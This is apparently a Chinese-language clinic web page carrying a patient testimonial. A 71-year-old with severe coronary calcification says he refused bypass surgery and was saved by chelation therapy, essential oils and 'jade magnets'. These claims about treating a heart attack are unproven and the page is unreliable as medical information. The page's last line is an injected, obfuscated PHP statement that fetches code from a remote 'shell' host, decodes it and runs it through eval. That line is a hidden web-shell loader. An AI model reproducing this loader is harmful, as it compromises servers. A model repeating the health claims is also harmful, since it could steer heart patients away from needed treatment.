收藏本站
首頁 arrow 螯療案例 arrow 從急性心肌梗塞邊緣救回
從急性心肌梗塞邊緣救回 列印 E-mail
文章索引
從急性心肌梗塞邊緣救回
頁 2

個案二:羅先生/七十一歲/公職退休/居住嘉義
症狀:冠狀動脈硬化且鈣化,頭暈、頭痛、耳鳴、胸痛、腰酸腰痛、兩膝無力。

從急性心肌梗塞邊緣救回

長年對抗高血壓病症


家族性的高血壓及心臟病,讓我父親在一次酒後因急性心肌梗塞送醫急救不治!

而存在我身上的顯性遺傳基因,使疾病在青壯年時就緊隨著我。

三十歲開始,我就因為工作及考試壓力太大,

十二指腸陸續出血過許多次,其中較嚴重的八次。

甚至必須住院治療。四十八歲時的中風,嚴重的頭昏腦漲、頭腦混沌,

讓我連最簡單的一到十都無法順利數完,完全無法記憶與思考。

之後連續四、五次的輕微中風,身體狀況及生活品質更是每況愈下!

所幸我的辛勞換得了孩子的長進,兒子唸醫學院當了醫生,也娶了個門當戶對的醫生媳婦。

但,即便兒子和媳婦都是醫生,仍然無法解決我服用高血壓藥的

明顯副作用──有時頭暈、有時膝蓋嚴重疼痛,

有時全身覺得不對勁、手腳發麻…等。

寧死不做手術!

除夕前三天,我在家中打坐念經書時,劇烈的胸痛突然來襲,前胸心臟處痛到好像要爆炸一樣!

媳婦趕緊讓我使用舌下甘油片,連續吃了三顆,才讓這種可怕的疼痛緩解。

經過一連串的檢查,診斷為急性心肌梗塞。

醫生原本想要在我的冠狀動脈中裝支架,可是過年後經過心導管檢查,

發現我有三條主動脈都嚴重鈣化與硬化,

根本無法裝支架。於是醫生告訴我:「你的情況只有兩條路可選:如果不開刀,

生命看得到盡頭;如果希望生命能延續,

唯一的途徑就是馬上做心臟血管繞道手術。」

我聽說這種手術需要切斷幾根肋骨,還要鋸開胸骨,

又要從大腿中將部分靜脈血管切除,移植到心臟取代阻塞的冠狀動脈,危險性很大!

幾經思量,我告訴兒子:「寧死也不做手術!」

他知道我不動手術的後果就是隨時會有生命危險,卻也拗不過我的堅持。

就在此時,我兒子陽明大學的學長──劉大元醫師剛好有事找我兒子,

我兒子便跟他談起我的病情和我不肯動手術的決定。

沒想到劉醫師告訴我兒子,在他的診所中有一種「螯合療法」。

那……姑且一試!

到了劉醫師的診所,使用電針完成檢查後,

他看了我一眼說:「你的下眼皮發綠,表示脾氣很急,你知道嗎?」

我尷尬的點點頭,然後劉醫師更明確的指出我其餘的症狀,諸如困擾我甚久的頭暈、頭痛及耳鳴,

胸痛的位置、早晨起來會腰酸腰痛以及兩膝無力等等。

這些我尚未開口告知、甚至連我兒子都不太清楚的症狀,

卻被劉醫師一一道明,實在令我訝異!

劉醫師又接著說:「既然不手術,只能等死!既然願意等死,而且也不怕死,

事情處理起來會比較單純──就是搶時間,儘快做治療。」

我參不透劉醫師話語裡的機鋒,聽不懂我究竟要怎麼「被處理」?

只見劉醫師拿了一瓶精油在我手上塗抹,

不單滿室生香,連我的胸口、脖子及肩頸也頓時覺得輕鬆許多,

呼吸順暢,那種快要中風的感覺竟隨著完全消失。

找回生而為人的價值

後來劉醫師使用「中西醫整合療法」再加上「螯合療法」為我做治療,並教會我如何使用精油與玉磁。

他告訴我萬一急性心肌梗塞發作時,若立刻使用它們,可讓我活著被送到急診室接受急救。

當晚八點,我離開劉醫師的診所回南部,隔天我覺得自己身體有著前所未有的舒暢,心情大好,

便找來弟妹們在家裡打麻將。他們看到我,都覺得我精神健旺,前後判若兩人,實在是出乎意料!

其後每回接受螯合治療,我更是越感輕鬆。

我頻頻問劉醫師:「我要治療幾次,才可以讓我的冠狀動脈恢復正常?」

劉醫師對這個問題卻是始終不答。到了第七次治療時,

我忍不住告訴劉醫師:「我終於活得像個人了!」



 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));